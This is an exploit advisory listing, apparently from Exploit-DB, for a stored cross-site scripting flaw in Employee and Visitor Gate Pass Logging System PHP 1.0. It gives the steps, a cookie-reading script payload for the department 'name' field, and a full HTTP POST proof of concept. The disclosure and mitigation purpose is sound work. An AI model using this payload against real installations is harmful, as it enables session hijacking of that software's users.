Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)

vendor:

Employee and Visitor Gate Pass Logging System PHP

by:

Ilhami Selamet

8.8

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: Employee and Visitor Gate Pass Logging System PHP

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:sourcecodester:employee_and_visitor_gate_pass_logging_system_php:1.0

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux + XAMPP v8.0.12

2021

Employee and Visitor Gate Pass Logging System 1.0 – ‘name’ Stored Cross-Site Scripting (XSS)

Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability. An attacker can exploit this vulnerability by creating a new department and inputting a malicious payload in the department 'name' field. This payload will be stored in the application and will be triggered for all users that navigate to the 'Department List' page.

Mitigation:

Input validation should be used to prevent malicious payloads from being stored in the application.

Source

Exploit-DB raw data:

# Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)
# Date: 10.11.2021
# Exploit Author: İlhami Selamet
# Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code
# Version: v1.0
# Tested on: Kali Linux + XAMPP v8.0.12

Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.

Step 1 - Login with admin account & navigate to  'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department
Step 1 - Click on the 'Create New' button for adding a new department.
Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field - <script>alert(document.cookie)</script>
Step 3 - Save the department.

The stored XSS triggers for all users that navigate to the 'Department List' page.

PoC

POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888
Content-Length: 555
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department
Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54

-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="id"


-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="name"

<script>alert(document.cookie);</script>
-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="description"

desc
-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="status"

1
-----------------------------407760789114464123714007564888--